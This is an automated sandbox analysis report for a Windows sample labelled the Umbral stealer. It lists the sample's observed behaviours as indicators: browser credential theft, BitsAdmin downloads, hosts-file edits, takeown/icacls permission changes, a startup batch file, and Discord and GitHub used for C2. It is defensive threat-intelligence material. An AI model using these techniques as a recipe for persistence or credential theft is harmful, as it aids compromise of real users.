Malware Analysis Report

2024-10-16 05:03

Sample ID 240809-bapkmsxdkc
Target test.exe
SHA256 ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093
Tags
umbral credential_access discovery dropper execution exploit ransomware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093

Threat Level: Known bad

The file test.exe was found to be: Known bad.

Malicious Activity Summary

umbral credential_access discovery dropper execution exploit ransomware stealer

Umbral

Detect Umbral payload

Credentials from Password Stores: Credentials from Web Browsers

Possible privilege escalation attempt

Blocklisted process makes network request

Download via BitsAdmin

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Modifies file permissions

Drops startup file

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Unsigned PE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Suspicious use of FindShellTrayWindow

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Detects videocard installed

Enumerates system info in registry

Kills process with taskkill

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 00:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 00:56

Reported

2024-08-09 00:59

Platform

win11-20240802-en

Max time kernel

106s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\test.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2227988167-2813779459-4240799794-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\PickerHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\test.exe C:\Windows\system32\cmd.exe
PID 224 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\test.exe C:\Windows\system32\cmd.exe
